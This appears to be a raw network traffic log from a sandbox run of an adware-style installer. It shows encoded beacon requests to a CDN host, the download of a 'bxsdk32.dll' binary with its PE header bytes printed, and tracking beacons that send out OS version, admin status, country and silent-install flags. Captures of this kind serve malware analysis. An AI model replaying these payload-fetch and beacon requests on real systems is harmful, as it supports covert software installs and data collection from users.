GET /27944.ashx?e=QgW8pN5r26ZQhScA1jb3T4/h8s/3htVFnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZBVWaKclJYCzDHGXB7YFOPGAqkMremTu1SEeEcwb8K7i333RAvM0VMA8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpViqw Gsnisvn8SJA d bWCFI/522fKenZo2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1XouBlDz985kKJOGf0 Dr5Lhz28hMzlNbA= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=KC46TpkJIZx8NmhuTfZHgDyMpz1LiwuqKEhxUiTGHeVXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKBTIpR gV745zbBYCuaAtAuRQgcEYhwfEYgZF 0Xr0ySrXIxNf6X/p9WOvghCBTr/TdVMo67fxO0s IILilpWF27wThqOSPC/DYd0CRAC1t0wBJ8Bzh64YUklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGVCQ/iYxoLxYRi59DA/1o2VnsTn5x9YJkyrBnDEBfh98= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=aUlNCxxkjnRnA3VLGqrT9ZTha5n8fKHmaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO31QHs3X92ilHJn1GegIILyOsrHZsRsIfMRhg0WUsz0XmIajF ylV 6H8YWruN4e6MTuXTWi43QJYJW50WOaC75x7mM32iDekcU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0acKGEthajhj9pzlGGzbrZvv0QWEzb9/ayjCE16nItrycw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=W5y9y1UrGBlnA3VLGqrT9aPuao ctN6paMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3eqfOL09Waq7Xt7qcDfFhJwTxIUcsgQ wWDLNdKr8lliPhNVb7n8lt8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=aonlVHCKlbW/q1OYm6RuNmByKcxzlv585b37y9B2vIWAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJJl8f63dS692dskpjA9 6EJZxK5xGkdrnFAL52sIXt4VzrzFC04 gVxTj1NCBqzFNNh3QJEALW3S3BlOQDiqUVkeXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=uWabAt9SLcwnl2fxC/WcuzyMpz1Liwuq 16VblNcBpdXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKBTIpR gV745zbBYCuaAtAuRQgcEYhwfEYgZF 0Xr0ySaJkIKvOmtNBWOvghCBTr/TdVMo67fxO0s IILilpWF0vmoXMQKU1KjfsnOwcx38cDPVxwNO6aHCv3we1qTpKH8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:04 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /27944.ashx?e=AZwPyJy3TZi4/9HrRpQ3bFoXilXt x7l68pZe0fGxSA2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3cdBa1e8eaz1xJq30BnBykcZjhRhNNnVmPxZZ7PW1hqwWMnNHFDGURnWsPQyEGmp3E4AKI//EGlK8qJaeUqNPyfIROPie2z407nXsJR6HRCLBPEhRyyBD7Dl617yh4HAWXhuXtiRNzc6pgJ7bW38x7N6a7p3zoCTj900rk/u2q4sYtQkadOxeGUQrm7qkQJ07VLGI2tGMAZkEHlpLL4kVIVZsO2IRUm0S3fTzht6ovY1YV lHKmkCemqn1dzsO21qFO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnChhLYWo4Y/ac5Rhs262b79EFhM2/f2sowhNepyLa8nM= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:05 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Sat, 01 Aug 2015 04:17:05 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /27944.ashx?e=PcwT4QFtuPCnIVMsUgdaKeTSsuAiFgZ3EhGH33nPGlFA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZT4qEGVFBmbCNaC2D7gVLsXVWyif 2VH4gkOB3v7aTq0HF6v/LiU/bpEYybADOKl3RvzErPfRBsvzE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyG1ilf4LTBlruf1mkJJrsh5qUaB4LB4DB HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:09 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Sat, 01 Aug 2015 04:17:09 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /bxsdk32.dll HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dyd9qf154h76q.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 942080

Connection: keep-alive

Date: Thu, 23 Jul 2015 01:21:44 GMT

Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT

ETag: "05c47da12b0009bd98653f51287f7768"

Accept-Ranges: bytes

Server: AmazonS3

Age: 77888

X-Cache: Hit from cloudfront

Via: 1.1 462cdb6020d941cbe166e3fece73ca6d.cloudfront.net (CloudFront)

X-Amz-Cf-Id: iF_sYd9owr1lOc005qBVQxmuwxBwbDH4Xo3jecnUkQJoKpFmbFtMtQ==

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......gu..#...#...
#.......!...........#...........I......."......."......."...Rich#.....
......................PE..L...9.dT...........!................P.......
.................................`....................................
..............................................tn..@...................
................................8............................text...O.
.......................... ..`.rdata...t..........................@..@
.data...x.... ....... [email protected].........................
......@[email protected][email protected]....................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

GET /utility.gif?error=mem_strt&report=mini_s&ver=803&action=na&ms_vr=3&clock=4703&rnd=8361 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:17:43 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1438402674 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: vxOuXi588w/AzOHtdmuw15FhLDDx49YvMRFwaOXh44WIS/UP14H5vFXDcvW3xWKv

x-amz-request-id: 2FE2AE870D8CA48D

Date: Sat, 01 Aug 2015 04:17:48 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: vxOuXi
588w/AzOHtdmuw15FhLDDx49YvMRFwaOXh44WIS/UP14H5vFXDcvW3xWKv..x-amz-requ
est-id: 2FE2AE870D8CA48D..Date: Sat, 01 Aug 2015 04:17:48 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /installer-error.gif?action=sesamy&app=70881&appver=0&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402674&procruntime=7&rnd=1438402681 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: rgqK9EhjO BCJIP4qw gE9/IrWb3 FMbUZphs PlVRX0nKGBDxCHpWt8yEQNS7H7

x-amz-request-id: 1189B44B7C5A10F8

Date: Sat, 01 Aug 2015 04:17:54 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:37 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: rgqK9E
hjO BCJIP4qw gE9/IrWb3 FMbUZphs PlVRX0nKGBDxCHpWt8yEQNS7H7..x-amz-requ
est-id: 1189B44B7C5A10F8..Date: Sat, 01 Aug 2015 04:17:54 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:37 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001729&i=200&n=init_end_funnel_step_name&rnd=1438402681 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Hc6oQempavZmJ8nFd7psNibH8XXzQcicyRrK0X75dfXSEKW1SAOgjBmkPMaIhASO

x-amz-request-id: D8D4072E35B535DE

Date: Sat, 01 Aug 2015 04:17:54 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=300&n=deploy_start_funnel_step_name&rnd=1438402681 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 5fCdSekPahJuBjAPN3Da2ksQU1Za4Sezb94MIp68AGLpMRrH 9/762iREQcXlZaX

x-amz-request-id: CB9D566916DDA97C

Date: Sat, 01 Aug 2015 04:17:54 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 5fCdSe
kPahJuBjAPN3Da2ksQU1Za4Sezb94MIp68AGLpMRrH 9/762iREQcXlZaX..x-amz-requ
est-id: CB9D566916DDA97C..Date: Sat, 01 Aug 2015 04:17:54 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001729&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1438402683 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 4i8dT3SGT21ntb7xLqNbg5l1X6gb/TXDolETz5cvLSeEib4/3vdP9yNmIeBFKD7E

x-amz-request-id: DBCCCE9DC419839E

Date: Sat, 01 Aug 2015 04:17:56 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 4i8dT3
SGT21ntb7xLqNbg5l1X6gb/TXDolETz5cvLSeEib4/3vdP9yNmIeBFKD7E..x-amz-requ
est-id: DBCCCE9DC419839E..Date: Sat, 01 Aug 2015 04:17:56 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001729&i=500&n=deploy_notification_start_funnel_step_name&rnd=1438402684 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: WwXacb9md/kB6WaXgoOyKYj1kamOQiXxk5K1frWh7UGL/eh gLZuIKCe agg1Zbf

x-amz-request-id: 97609731C06D0957

Date: Sat, 01 Aug 2015 04:17:57 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1438402684 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: d8fcP6nco8ebNOe1qsUJ206lLQaF2akZJ04ezX79UaW2O3vgUNQLPY8rfoHy1FLN

x-amz-request-id: 562E01D3F1C28428

Date: Sat, 01 Aug 2015 04:17:57 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=700&n=deploy_ch_start_funnel_step_name&rnd=1438402684 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Iq7/z4rY1F27lOsQVcogGLy15LU0hL1vX5VxKMzgq5bOmiUj/KrewZFIG2DKGl4J

x-amz-request-id: 60E6A87DB2946CF5

Date: Sat, 01 Aug 2015 04:17:57 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=800&n=deploy_nova_start_funnel_step_name&rnd=1438402684 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: BLCY5xEgn3920M6ufpm4fGNUvc6clLUs75wE6mxGc/f/agzf/ESfd3hDlDaH/uoQ

x-amz-request-id: 2FA5EE880001314D

Date: Sat, 01 Aug 2015 04:17:57 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=900&n=deploy_ff_start_funnel_step_name&rnd=1438402684 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Nz1x3onDjSsEyaAw0s dRHuI77OeLIxNuPuqCehKjJW2mS49QHs9ng5QZLDm1Ad

x-amz-request-id: D918790A71DEDA6D

Date: Sat, 01 Aug 2015 04:17:58 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1438402685 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: qXoKBSsetrOdyEQLaIR9w8XGjQTvBd0oZj7meqVsn3y5LvxH NPUxZi qGvt7aWJ

x-amz-request-id: 6FBC13B7AED16120

Date: Sat, 01 Aug 2015 04:17:58 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1438402685 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: GPgO7dA7a jcmWyE8cryBlZqeYp2yfyxdXsxUcAA0/Ey1vrCKLeuuorEe/SZg0sI

x-amz-request-id: 585DB20DACD7AFDC

Date: Sat, 01 Aug 2015 04:17:58 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001729&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1438402685 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Mp1ewndJ6vrChdqGnXr/dOIJ/9/4VL/6/59Hhz Zy/u/ep0BynvHzAdQOhf8FvYT

x-amz-request-id: A52A7292C444FF68

Date: Sat, 01 Aug 2015 04:17:58 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Mp1ewn
dJ6vrChdqGnXr/dOIJ/9/4VL/6/59Hhz Zy/u/ep0BynvHzAdQOhf8FvYT..x-amz-requ
est-id: A52A7292C444FF68..Date: Sat, 01 Aug 2015 04:17:58 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001729&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1438402686 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: 49rDN5TWWXIPsLO3mA77XCo UQY421eqt0BVSomF5EjYc8ajLbgwi2FbWpUPHdPI

x-amz-request-id: 238C49BCAB1BACCA

Date: Sat, 01 Aug 2015 04:17:59 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 49rDN5
TWWXIPsLO3mA77XCo UQY421eqt0BVSomF5EjYc8ajLbgwi2FbWpUPHdPI..x-amz-requ
est-id: 238C49BCAB1BACCA..Date: Sat, 01 Aug 2015 04:17:59 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=001729&i=10000&n=deploy_end_funnel_step_name&rnd=1438402686 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: HQe49oiHw231ffhBFrLfnN aKhHcq21zVmFK 9xMW7ZS0KaDlm1tunl2U4mcE4Y4

x-amz-request-id: 7DB49418C46925FF

Date: Sat, 01 Aug 2015 04:17:59 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: HQe49o
iHw231ffhBFrLfnN aKhHcq21zVmFK 9xMW7ZS0KaDlm1tunl2U4mcE4Y4..x-amz-requ
est-id: 7DB49418C46925FF..Date: Sat, 01 Aug 2015 04:17:59 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;..

GET /utility.gif?report=fdata&f=3&c=803&i=10&n=ms_started&rnd=14220 HTTP/1.1

Host: errors.crossrider.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 01 Aug 2015 04:17:39 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT

Connection: close

GIF89a.............!.......,...........L..;..

GET /22600.ashx?e=b1dRW7RxYKdJjQ9qCj/WvVoXilXt x7lm0bTQPH88bQ2fVsQFDtppP2TEkHeJNDUDPI5dGTWg7/48CMVjnZqYdnXPxrWRGn2d/XCztdoPbJFiFlIaXxqEcmxw368usKjvx7ENkzRxOw/caEgn1aywj5N0jWsNR8MoexnI9SC14XbVwDStlFVZXVJgYQsPAh56xK0PQZ59GgROorJaaO22BkEWzuBPTEcJ0k C/6MtQnml2XdXjKhJm0LdlReY2/iE4Rn18L003uz0Lu2aZ4hDhQmP15je1GaTsjjJ8mc3T10pg6XDy/3LwNoUkQDviUHTEz4kyYc5/8KqZVqYWlwcAjHfcNnTKtbTyejejUzNC3Sr/B971errA9fO2Yg5guFF8alrqvW22iZlBAV/P QIa 2UJQ2VzF0N25JKCCCveTyBEepkkHbwkqC3cQqqaHCVSjIz3u7VGsuJbKr /YbypnDhgEfcwOQ UeIwETGMM8UMNmz6spbXupRrnThziN0QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiaF8KpepynoFA== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

